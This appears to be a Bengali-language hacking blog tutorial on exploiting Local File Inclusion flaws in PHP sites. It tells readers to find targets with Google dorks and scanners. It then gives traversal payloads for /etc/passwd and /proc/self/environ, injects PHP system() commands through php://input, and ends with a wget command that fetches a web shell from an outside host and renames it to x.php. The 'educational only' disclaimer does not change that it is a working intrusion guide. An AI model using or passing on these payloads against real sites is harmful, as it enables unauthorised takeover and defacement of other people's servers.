সবাইকে স্বাগতম আমার টিউটোরিয়ালে।
(টিউটোরিয়ালটি শুধুমাত্র শিক্ষনীয় উদ্দ্যেশ্যে লেখা)
আজকের টিউটোরিয়ালে আমরা LFI হ্যাকিং সম্পর্কে জানবো।এবং কিভাবে এক্সপ্লইট করতে হয় সেটা শিখবো
LFI Vulnerability কিঃ
সোজা ভাষায় বলতে গেলে কোনো স্ক্রিপ্টে বা সাইটে LFI Vulnerability থাকলে । সেই সাইটে কিছু নির্দিষ্ট কোড এক্সিকিউট করলে। সেই সাইটের স্পর্শকাতর তথ্য সমূহ আপনি আপনার ওয়েবপেইজে দেখতে পাবেন ।
কোড রান করাবেন কিভাবে ?
আপনি যে সাইটে LFI দুর্বলতা পাবেন ।সেই সাইটের এড্রেসের শেষে আপনি কিছু নির্দিষ্ট কোডের মাধ্যমে সাইটি এক্সপ্লইট করতে পারবেন । এমনকি সাইটটিতে শেল আপলোড করে সাইটের যে কোনো ডাটা এডিট,ডিলেট
এবং আপনার নিজের পেইজ,স্ক্রিপ্ট আপলোড দিতে পারবেন।
কিভাবে LFI Vulnerable Site বের করবেন?
প্রথমেই আপনার যদি কোনো টার্গেট সাইট না থাকে তাহলে গুগল Dork ব্যাবহার করে আপনি LFI Vulnerable সাইট বের করতে পারেন । আর টার্গেট সাইট থাকলে স্ক্যানারের মাধ্যমে আপনি সেই সাইটের LFI Vulnerability পেলে আপনি কাজ করা শূরু করে দিতে পারেন LFI Vulnerability নিয়ে। যায় হোক এই সব ব্যাপার বিস্তারিত বলার কোনো দরকার নাই। আশা করি আপনার নিজ মাথা খাটিয়ে ব্যাপার গুলো বুঝে নিবেন।
কিভাবে LFI Vulnerability চেক করবেন :
বেশীর ভাগ LFI Vulnerability চেক করার জন্যে আপনি নির্দিষ্ট কিছু কোড ব্যাবহার করতে পারেন।
আর LFI Vulnerable Site এর লিঙ্ক হয় এরকমঃ
Examplelfi.com/index.php?page=
এর মানে এই নয় যে এই ধরনের যত সাইট আছে সব সাইট LFI Vulnerable!
যায় হোক । এখন আমি টেস্ট করবো এই সাইট ভুলনরাবল কিনা!
আমি একটি কোড রান করাবো এই লিঙ্ক এর = এর পর দেখি ওয়েবব্রাউজার আমাকে কি দেখায় ।
Examplelfi.com/index.php?page=../../../../../../../../../etc/passwd
আমি এই ধরনের রেসাল্ট দেখতে পেলাম
ছবিঃ
http://i.share.pho.to/b3506346_o.png
এবার আমরা আরেকটি কোড এক্সিকিউট করার পর দেখি সেটার রেসাল্ট কি আসে
কোডটি হচ্ছে:
/proc/self/environ
উদাহারণ দেখুনঃ
Examplelfi.com/index.php?page=/proc/self/environ
কিছুই দেখাচ্ছে না:
http://i.share.pho.to/76f5f4e7_o.png
যায় হোক আবার আমরা কিছু PHP ডাটা ইনপুট করার চেষ্টা করবো ডাটা পোস্ট মেথড ব্যাবহার করে যার জন্যে দরকার হবে হ্যাকবার ।
এটা মোজিলা ফায়ারফক্সের একটি এডঅন, এবং হ্যাকারদের অত্যন্ত কাজের জিনিস।
এখন আমরা আমাদের টার্গেট সাইট একটা কমান্ড এক্সিকিউট করে আরো কিছু ইনফরমেশন পাওয়ার চেষ্টা করি।
নিচের ছবিটিতে লক্ষ্য করুন এখানে আমি কমান্ড ব্যাবহার করেছি এভাবেঃ
Examplelfi.com/index.php?page=php://input
এবং হ্যাকবারের নিচে Enable Post ডাটা নামে একটা অপশন আছে তার পাশে টিক চিহ্ন টি টিক করে করে দিলে নিচে আরেকটি বক্স ওপেন হবে যেটা দিয়ে ডাটা পোস্ট করা যায়
এবং সেখানে আমি কমান্ড দিলামঃ
<? System(‘id’); ?>
এই কমান্ড এক্সিকিউট করার পর কি রেসাল্ট আসছে সেটা একটু দেখি আসেন
ওয়েব সার্ভার রিলিটেড তথ্য
http://i.share.pho.to/4d0c0a62_o.png
এখন আসুন দেখি এই ডাইরেক্টরি তে কি কি ফাইল আছে
তার জন্যে কমান্ড হবে এরকম হ্যাকবারের এড্রেস লেখার জায়গায় এড্রেসটি আগের মতন থাকবে শুধু মাত্র পোস্ট ডাটার জায়গায় যে কমান্ডটি লেখেছিলাম তার মধ্যে সামন্য পরিবর্তন আসবে ।
এড্রেস থাকবে আগের মতনঃ
Examplelfi.com/index.php?page=php://input
এবং পোস্ট ডাটা বক্সে কমান্ড হবে
<? System(‘ls’); ?>
এই কমান্ডটি এক্সিকিউট করার পর ঐ ডাইরেক্টরি তে কি কি ফাইল আছে সেটা দেখাবে !
যায় হোক এই কমান্ডটি মনে রাখুন কারণ এটা শেষের দিকে দরকার হবে।
চলুন আবার তাহলে আসল কাজটা করেই ফেলি
শেল আপলোডের কাজ।
সেটাও করবো পোস্ট ডাটার মাধ্যমে ।। তার আগে আপনি গুগল থেকে বের করুন কোনো শেল হোস্ট করা আছে এমন কোনো ওয়েবসাইট, শেলটি টেক্সট ফরম্যাটে থাকলেই চলবে।
(বিস্তারিত দেখানো সম্ভব না :P)
এখন মনে করুন আপনার হোস্ট করা শেলটির লিঙ্ক এরকমঃ
http://yourshell.com/sh3ll.txt
এখন আমরা কমান্ড এক্সিকিউট করবো পোস্ট ডাটা বক্সটি ব্যাবহার করে। কিভাবে?
এড্রেস বক্সে থাকবে এই এড্রেসঃ
Examplelfi.com/index.php?page=php://input
এবং পোস্ট ডাটা বক্সে কমান্ড হবেঃ
<? System(‘wget http://yourshell.com/sh3ll.txt’); ?>
এইবার এক্সিকিউট করুন হ্যাকবারের মাধ্যমে এই কমান্ড J
ব্লাঙ্ক পেইজ দেখতে পাবেন রেসাল্টে !
এইবার একটা কমান্ড মনে রাখতে বলেছিলাম আগে
সেটা খেয়াল আছে তো ?
সেই কমান্ডটি হচ্ছেঃ
<? System(‘ls’); ?>
এখন যে ডাইরেক্টরিতে শেল আপলোড দিয়েছি সেই ডাইরেক্টরিতে শেলটি কিনামে সেভ হয়েছে সেটা দেখতে পাবো।
এছাড়াও ঐ ডাইরেক্টরির অন্য ফাইল গুলোর নাম ও দেখাবে কিন্তু আপনার আপলোড করা শেলের নাম দেখলেয় আপনি বুঝতে পারবেন কোনটা আপনার শেল! মনে করেন আমারটার নাম দেখতে পেলাম Sh3ll.txt
যায় হোক এইবার হচ্ছে রিনেম করার পালা।
আমরা আপলোড করা শেলটি রিনেম করবো । এবং টেক্সট ফরম্যাট থেকে পিএইচপি তে নিয়ে যাবো!
যার জন্যে আবার পোস্ট বক্সে কমান্ড লেখুন।
<? System(‘mv sh3ll.txt x.php’); ?>
কাজ শেষ J
এখন শেলের লিঙ্ক হবে: Examplelfi.com/x.php
আজকের টিউটোরিয়াল এখানেই শেষ আশা করি আপনারা নতুন কিছু শিখতে পেরেছেন ।
SQLi নিয়ে আরো কয়েকটি টিউটোরিয়াল লেখবো। তবে এর পরের টিউটোরিয়ালে হ্যাশ থেকে কিভাবে পাসওয়ার্ড বের করা যায় এবং শেল আপলোডিং নিয়ে লেখার চেষ্টা করবো।
ধন্যাবাদ সবাইকে ।
পোস্ট সম্পর্কিত সমস্যার জন্য মন্তব্য দিন।ডাউনলোড লিঙ্ক এ সমস্যা জন্য ইনবক্স করুন Aimzworld007
ConversionConversion EmoticonEmoticon